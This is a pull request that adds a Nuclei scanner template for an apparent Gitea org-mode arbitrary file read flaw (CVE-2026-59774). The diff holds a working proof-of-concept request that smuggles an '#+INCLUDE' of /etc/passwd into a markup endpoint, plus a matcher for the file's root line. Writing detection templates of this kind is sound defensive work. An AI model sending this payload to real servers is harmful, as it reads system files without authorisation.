### PR TITLE
Add CVE-2026-59774 template

### DIFF
--- a/http/cves/2026/CVE-2026-59774.yaml
+++ b/http/cves/2026/CVE-2026-59774.yaml
@@ -1,0 +1,31 @@
+id: cve-2026-59774-gitea-org-mode-file-read
+
+info:
+  name: Gitea Org-mode Arbitrary File Read (CVE-2026-59774)
+  author: str4k3r
+  severity: high
+  description: Detects the Gitea org-mode markup arbitrary file read vulnerability before version 1.27.1.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-59774
+  classification:
+    cve-id: CVE-2026-59774
+  metadata:
+    verified: true
+  tags: cve,cve2026,gitea,orgmode,file-read
+
+http:
+  - method: POST
+    path:
+      - "{{BaseURL}}/admin/pub/markup"
+    headers:
+      Content-Type: application/json
+    body: '{"Text":"#+INCLUDE: \"/etc/passwd\" src shell","Mode":"file","FilePath":"x.org","Context":"/admin/pub"}'
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: regex
+        part: body
+        regex:
+          - "root:x:0:0:root:/root:/bin/sh"


### PR DESCRIPTION
Adds the Nuclei template for this CVE based on public advisory references. The template includes an HTTP proof-of-concept request and response matchers for maintainer review.